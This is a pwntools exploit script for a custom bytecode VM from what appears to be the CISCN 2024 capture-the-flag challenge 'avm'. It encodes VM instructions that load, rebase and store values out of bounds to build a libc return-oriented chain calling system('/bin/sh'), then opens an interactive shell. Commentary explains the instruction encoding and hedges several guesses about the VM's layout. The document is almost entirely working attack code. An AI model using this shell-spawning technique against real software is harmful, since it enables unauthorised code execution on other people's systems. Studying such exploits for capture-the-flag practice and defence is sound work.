from pwn import *

# Local exploit harness for a custom bytecode VM ("avm"), built on pwntools.
# Everything here is bound to one specific environment: absolute file paths,
# a fixed GDB breakpoint and hard-coded libc offsets. None of it is portable;
# every constant has to be re-derived for a different binary or libc build.
io = process("/home/ben/Desktop/CISCN2024/avm/pwn")
libc = ELF("/home/ben/Desktop/CISCN2024/avm/libc.so.6")

# libc-relative offsets, presumably taken from this libc.so.6 build
# (verify against the ELF object, e.g. libc.symbols, before reuse).
libc_start_main = 0x29d90
pop_rdi = 0x2a3e5
ret = 0x29139
system = 0x50d70
# ELF.search yields addresses relative to libc.address; with the default
# (unset) base that is presumably an offset on the same footing as the
# constants above — confirm if libc.address is ever set.
binsh = next(libc.search(b'/bin/sh'))

# Attach GDB right away, breaking at a fixed offset inside the PIE binary
# ($rebase adds the runtime load base). Interactive debugging only.
gdb.attach(io,"b *$rebase(0x1aad)")


def operation(opcode, i, j, k):
    """Encode one 32-bit little-endian VM instruction word.

    Field placement, exactly as written: ``opcode`` in bits 28+, ``j`` at
    bit 16, ``i`` at bit 5 and ``k`` in the low bits. The fields are
    combined with ``+`` rather than ``|``, and ``i << 5`` overlaps ``k``
    whenever k >= 32, so a collision would silently carry into the ``i``
    field. Every call in this script keeps k <= 14 and i <= 6, so no
    overlap occurs here.
    NOTE(review): the ``i << 5`` placement cannot be checked against the
    VM's decoder from this file — confirm before relying on it elsewhere.
    """
    return p32((opcode << 28) + (i << 5) + (j << 16) + k)


def add(i, j, k):
    """Opcode 1. Presumably reg[k] = reg[i] + reg[j] — inferred from usage below, not from the VM."""
    return operation(1, i, j, k)


def sub(i, j, k):
    """Opcode 2. Presumably reg[k] = reg[i] - reg[j] — inferred from usage below, not from the VM."""
    return operation(2, i, j, k)


def store(i, j, k):
    """Opcode 9. Presumably writes reg[k] to memory at offset j (i is always 1 here) — TODO confirm."""
    return operation(9, i, j, k)


def load(i, j, k):
    """Opcode 10. Presumably reads memory at offset j into reg[k] (i is always 1 here) — TODO confirm."""
    return operation(10, i, j, k)


# Payload: 15 instruction words, a 32-bit zero word, then five 64-bit values.
# Reading the helpers with their apparent (src, src, dst) convention, the
# stream does: r4 <- [0xd38], r5 <- [0x160], r6 = r4 - r5; then for each of
# the words at 0x168/0x170/0x178/0x180: r_n = r6 + word, stored back at
# 0x118/0x120/0x128/0x130. In other words four values are rebased by the
# delta between [0xd38] and [0x160]. Presumably that converts the libc
# offsets sent at the tail into absolute addresses — TODO confirm the VM's
# memory layout; this file does not show where the trailing p64 values land.
# The p32(0) after the last store is presumably an opcode the VM rejects,
# which is what the recvuntil below waits for.
opcode = load(1, 0xd38, 4) + load(1, 0x160, 5) + \
    sub(4, 5, 6) + load(1, 0x168, 7) + \
    add(6, 7, 8) + load(1, 0x170, 9) + \
    add(6, 9, 10) + load(1, 0x178, 11) + \
    add(6, 11, 12) + load(1, 0x180, 13) + \
    add(6, 13, 14) + store(1, 0x118, 8) + \
    store(1, 0x120, 10) + store(1, 0x128, 12) + \
    store(1, 0x130, 14) + p32(0) + \
    p64(libc_start_main) + p64(pop_rdi) + \
    p64(binsh) + p64(ret) + p64(system)

io.send(opcode)
# Block until the target prints its "unsupported instruction" diagnostic,
# then hand the session over to the user.
io.recvuntil(b'opcode: Unsupported instruction\n')
io.interactive()